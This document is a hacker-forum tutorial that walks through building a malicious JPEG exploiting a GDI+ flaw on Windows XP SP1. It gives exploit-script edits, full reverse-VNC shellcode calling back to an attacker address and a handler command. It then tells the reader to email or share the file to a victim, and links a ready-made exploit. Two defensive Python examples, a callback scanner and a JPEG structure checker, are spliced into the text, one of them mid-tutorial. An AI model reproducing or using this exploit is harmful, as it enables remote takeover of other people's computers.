Intro to Buffer Overflows
By IMC Tullywacker

Shouts: IMC GrahamPhisher, IMC EXE, IMC TwiZted, IMC PhirePhreak
Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org

Hello, today I am going to be showing you how to perform a buffer overflow on a Windows XP SP1 box. I am going to be using BackTrack 3 beta, as should you, to be able to follow along easily. If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial.

http://en.wikipedia.org/wiki/Buffer_overflow

OK, let's begin. Fire up BackTrack and open up a new terminal.

Code:
cd /pentest/exploits/milw0rm

OK, now let's search the sploit list for GDI exploits:

Code:
cat sploitlist.txt |grep -i GDI

Now copy the 475.sh sploit to the /tmp/ directory:

Code:
cp ./platforms/windows/remote/475.sh /tmp/

Now let's edit the file to better suit our needs:

Code:
nano /tmp/475.sh

We need to edit the address of the shellcode for a Windows XP SP1 English box, so comment out the 1st line and uncomment the 2nd like so:

Code:
#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0

Next, there are formatting problems in the image junk section that need to be corrected:

Code:
#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";

Now let's edit the shellcode area. We need to replace \xCC with a NOP (\x90) and fix another formatting issue:

Code:
#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works!

OK, next fix yet another formatting issue:

Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************

Now, the original purpose of this exploit is to add an administrator to the Users group, as you can see from the line above. We are going to be using a reverse VNC connection instead, because a nice GUI is always the most fun.
You can do it the original way if you want, just to see that the sploit works, but here at IMC we strive to do shit differently :)

Now cd to the framework2 directory:

Code:
cd /pentest/exploits/framework2

To view all the payloads type:

Code:
../msfpayload

We're going to use the win32_reverse_vncinject payload. Now, to see what variables need to be set, we type:

Code:
../msfpayload win32_reverse_vncinject

As you can see the only field left blank is the LHOST option, so we need our LAN IP address:

Code:
ifconfig

Code:
inet addr:192.168.1.113

Now we need to get our custom payload and put it into our sploit:

Code:
../msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P

This will return the payload that is suited for our needs. Here's mine:

Code:
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

So copy your payload, and now let's put it in our sploit:

Code:
nano /tmp/475.sh

Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

Now we need to set up our payload handler:

Code:
../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102

Now you need to make your sploit into a .jpg file:

Code:
cd /tmp/

Code:
chmod +x 475.sh

Code:
../475.sh > nude.jpg

Now what you're going to do is give the victim the file: email, share, whatever, up to you.
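From the other side of the fence: when a payload like the one above turns up in a captured file, the first question an incident responder asks is where it phones home. Reverse-connect shellcode has to build a sockaddr_in before it can call connect(), and on x86 that is almost always two immediate pushes: the IPv4 address, then AF_INET (0x0002, little-endian) packed with the port in network byte order. The following Python scanner is an added example, not part of this tutorial or of Metasploit; it looks for that push/push pair and decodes it. The sample input is a constructed excerpt of the payload bytes shown above (filler around the ten bytes that carry the sockaddr), and the pattern is a heuristic: it will miss payloads that assemble the address some other way and can produce a false hit on unrelated code that happens to contain the same byte sequence.

```python
"""Recover the hard-coded callback address from a reverse-connect payload blob.

Added example for defenders; not from the tutorial above and not Metasploit code.
Heuristic: find `push imm32` (0x68) of the IPv4 address immediately followed by
`push imm32` whose low word is 0x0002 (AF_INET) and whose high word is the port
in network byte order, i.e. the bytes 68 AA BB CC DD 68 02 00 PP PP.
"""
import re
import socket
import struct
from typing import List, Tuple

# .{4} = the four address bytes, .{2} = the two port bytes (big-endian on the wire).
# DOTALL so that 0x0A inside an address or port still matches.
_SOCKADDR_PAIR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def find_callbacks(blob: bytes) -> List[Tuple[str, int]]:
    """Return every (ip, port) pair that matches the push/push sockaddr idiom."""
    hits = []
    for m in _SOCKADDR_PAIR.finditer(blob):
        ip = socket.inet_ntoa(m.group(1))           # bytes already in network order
        port = struct.unpack(">H", m.group(2))[0]   # sin_port is big-endian
        hits.append((ip, port))
    return hits


# Constructed sample: an excerpt of the tutorial's win32_reverse_vncinject payload,
# a few instructions either side of the sockaddr pushes.
SAMPLE = (
    b"\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7"
    b"\x68\xc0\xa8\x01\x71"      # push 192.168.1.113
    b"\x68\x02\x00\x10\xe1"      # push AF_INET | port 0x10e1 (4321) in network order
    b"\x89\xe1\x6a\x10\x51\x57"
)

# A blob with no sockaddr idiom at all, to show the scanner stays quiet.
NOISE = b"\x90" * 32


if __name__ == "__main__":
    for ip, port in find_callbacks(SAMPLE):
        print(f"callback: {ip}:{port}")
```

The address recovered this way is whatever LHOST was given to msfpayload when the payload was generated, which is the value worth blocking or hunting for in connection logs; it says nothing about where a handler happens to be listening later.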
All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file; they don't even have to open the image itself! This will spawn a VNC session and give you a GUI of the computer.

Congrats on making your 1st malicious JPG file.

For all you lazy people I've uploaded the modified sploit; all you have to do is change the payload:

Code:
http://imctully.hostaim.com/maliciousjpg.txt

~Tully
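Since the whole attack rides on an image file whose structure is wrong rather than on anything the user does, the place to stop it is before any image decoder (thumbnailer, mail client, web proxy) ever parses it. As an added example, not from this tutorial, here is a Python walker over JPEG marker segments that reports the structural defects a crafted image tends to carry and a well-formed one never does: a segment whose declared length is smaller than the two length bytes it must include (which underflows any parser that subtracts 2 before bounds-checking), a segment length that runs past the end of the file, entropy-coded data that never reaches an EOI marker, a stray byte where a marker should be, and bytes trailing after the FFD9 end-of-image marker the script above is so careful about. All sample images are constructed inline; this is a generic structural check, not a signature for this particular file.

```python
"""Structural sanity check for JPEG files: walk the marker segments and report defects.

Added example for defenders; not part of the tutorial above. Pure Python, no image
library needed, so it can run on a mail gateway or file share before a real decoder
ever touches the bytes.
"""
import struct
from typing import List

SOI, EOI, SOS = 0xFFD8, 0xFFD9, 0xFFDA
# Markers that carry no 2-byte length field: SOI, EOI, TEM and the restart markers RST0..RST7.
STANDALONE = {0xFFD8, 0xFFD9, 0xFF01} | {0xFFD0 + i for i in range(8)}


def walk_jpeg(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means the file is structurally clean."""
    findings: List[str] = []
    if data[:2] != b"\xFF\xD8":
        return ["missing SOI marker at offset 0"]
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            findings.append(f"expected marker at offset {pos:#x}, got byte {data[pos]:#04x}")
            return findings
        while pos < len(data) and data[pos] == 0xFF:   # 0xFF fill bytes may precede a marker
            pos += 1
        if pos >= len(data):
            findings.append("truncated: file ends inside a marker")
            return findings
        marker = 0xFF00 | data[pos]
        pos += 1
        if marker == EOI:
            if pos != len(data):
                findings.append(f"{len(data) - pos} trailing bytes after EOI")
            return findings
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            findings.append(f"truncated: marker {marker:#06x} has no length field")
            return findings
        length = struct.unpack(">H", data[pos:pos + 2])[0]   # length includes its own 2 bytes
        if length < 2:
            findings.append(f"marker {marker:#06x} at offset {pos - 2:#x} declares length {length} (< 2)")
            return findings
        if pos + length > len(data):
            findings.append(f"marker {marker:#06x} at offset {pos - 2:#x} length {length} overruns file")
            return findings
        pos += length
        if marker == SOS:
            # Entropy-coded data follows: skip until a real marker (not FF00 stuffing, not RSTn).
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
            if pos + 1 >= len(data):
                findings.append("entropy-coded data runs to end of file without EOI")
                return findings
    findings.append("no EOI marker before end of file")
    return findings


# Constructed samples (minimal, not decodable pictures; only the segment structure matters).
CLEAN = b"\xFF\xD8" + b"\xFF\xFE\x00\x05abc" + b"\xFF\xD9"              # SOI, 3-byte comment, EOI
SCAN_CLEAN = b"\xFF\xD8" + b"\xFF\xDA\x00\x02" + b"\x12\x34\xFF\x00\x56" + b"\xFF\xD9"  # SOS with stuffed FF00
BAD_LENGTH = b"\xFF\xD8" + b"\xFF\xFE\x00\x01" + b"\xFF\xD9"            # length field below 2
OVERRUN = b"\xFF\xD8" + b"\xFF\xFE\x01\x00abc"                          # claims 256 bytes, has 3
TRAILING = CLEAN + b"\x90\x90\x90\x90"                                  # bytes after EOI
NO_EOI = b"\xFF\xD8" + b"\xFF\xDA\x00\x02" + b"\x12\x34\x56"            # scan data, never ends


if __name__ == "__main__":
    for name, blob in [("CLEAN", CLEAN), ("BAD_LENGTH", BAD_LENGTH), ("TRAILING", TRAILING)]:
        print(name, walk_jpeg(blob) or "ok")
```

Any finding is reason enough to quarantine the file; none of these conditions occur in an image written by a normal encoder, and a parser that rejects them never reaches the arithmetic a crafted length field is aimed at.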